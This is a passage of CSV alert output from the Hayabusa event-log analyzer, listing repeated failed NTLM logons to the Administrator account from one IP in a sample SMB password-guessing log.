+09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 96BwmhKqDIojhdRA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.601 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DiRvofjwoeAdHYrv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.655 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: BNLdOrPwbvYELiCc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.704 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: x15WKTspmg2ALHaY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.748 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: QMoQWddkcYtCmoKm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.784 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: jhTbfX42Pwn7OA2k | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.814 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: yXcbUCgAhVFfqLc3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.856 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: GHyXVM0jpaKBiY9N | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.896 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: TZoWEcU6VbEnrLpx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.939 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LIfEzNQWwvrai4ga | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:55.980 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: DhImfqWz7SHId9hE | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.014 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: s6sekQfneNE5uFtx | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.068 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: iEQ6KkZEHGcSgdA8 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.103 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qzxJYBbM7ZMaaGOo | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.151 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: wO5GFBqSltNfjtQT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.198 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: PdsMzjfP1ZcPju2i | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.232 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2LqpKmoCX9slPXie | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.284 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ouHvw1LXTN3OSFYb | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.320 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tZIB1QO7hfugceJg | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.364 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: u4QU2BQ0u5tJsdjG | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.404 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0P7NKiKCmLvu6L1L | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.440 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 4obkK4RfsLZe5gdi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.482 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: JRUDpDLhgop8d1el | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.530 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: LvdsNkFqfFWRePXJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.557 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 5wvd8c1jYrEZMcKI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.600 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: AWvECxgkvWdg9Zdc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.648 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lHHPOAYSMSp3BhX7 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.692 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: rJicXUMfrx9BOzHI | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.788 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: eybrQWvrvwSkNADJ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.816 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VVMPCaQB0XteDSwC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.861 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: lbjjLoATZE6KPIQv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.906 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tips954DRcYeIB2T | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.945 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nLe9aMiMz0akxfWW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:56.976 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: csroGB9KZOZkb5sY | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.016 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 9Zl4Rc25RsvJ7Y9H | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.058 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: C5CxqCFOIJBMZCD6 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.084 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: gVPwxpR05F3B5aXp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.133 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nP317UkK2DhTD5Rd | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.180 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: ir3c7dqXm1LhbfqU | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.220 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1U1QZiJSrEufxF3b | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.252 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: HZnDnDhTPuC9n5A1 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.300 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 72gY1ClzwuisAhKW | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.340 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nrneLGOZCwPIeQgT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.386 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: dm3gGV2yR4B3yrJi | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.419 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fzeklLG1KCTE5FpP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.460 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: uZPwxCw3EWy9NShk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.499 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MalB3OcsOsRaMtS3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.540 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: XMZMqCYPHO3n4RIh | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.584 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: I1VUeIuU1rQPISNA | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.627 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: md4ioB8wNiaz2EKB | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.664 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: nM8QaFeqwDfJZ1gc | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.701 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: hlR75rMhpLnfQZbC | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.746 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: WF8BcOe4YUDYTXkj | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.786 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: FK0Iiao20PyPmtTk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.832 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kQbCbAHrQilFmMZP | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.866 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: VUdXQOw98VVoksDM | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.900 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: fISqpC8eKlaQGabv | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.936 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: s5Y0VryMAHjtB3n2 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:57.976 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: bsjAHlztFIC8tBt0 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:58.012 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CiEQlAlTOhqOKpmy | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:58.052 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: i7lUqZMROQXNUtQm | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:58.088 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 0eFCGEtOLzjUxI5v | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:58.128 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: CqfOAGcVcwSgaeo3 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:58.168 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 2hcqVJzkVgvUnebk | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:58.212 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: Q9ZpqiTGXqJlAQTZ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:58.255 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: qCzXKlJ2vPeqqdfa | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:58.288 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: tITW0ihpErFk3nKp | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:58.344 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: MdQqr1T4frPNlulf | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:58.385 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: niiXRpP5AVHpG9Hu | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:58.432 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: EThR98jZUdwNxbXQ | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:58.465 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: NBsJcIw859FfEkLD | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:58.502 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: kG4Tv5vauSWhbj8F | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:58.543 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 453tjgRGMu46vC33 | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
2016-09-20 01:50:58.580 +09:00,DESKTOP-M5SN04R,4625,low,,Logon Failure - Wrong Password,User: Administrator | Type: 3 | Computer: 1fnzhhfszxJWxLCT | IP Addr: 192.168.198.149 | AuthPackage: NTLM,rules/hayabusa/default/alerts/Security/4625_LateralMovement_LogonFailure-WrongPassword.yml,../hayabusa-sample-evtx/DeepBlueCLI/smb-password-guessing-security.evtx
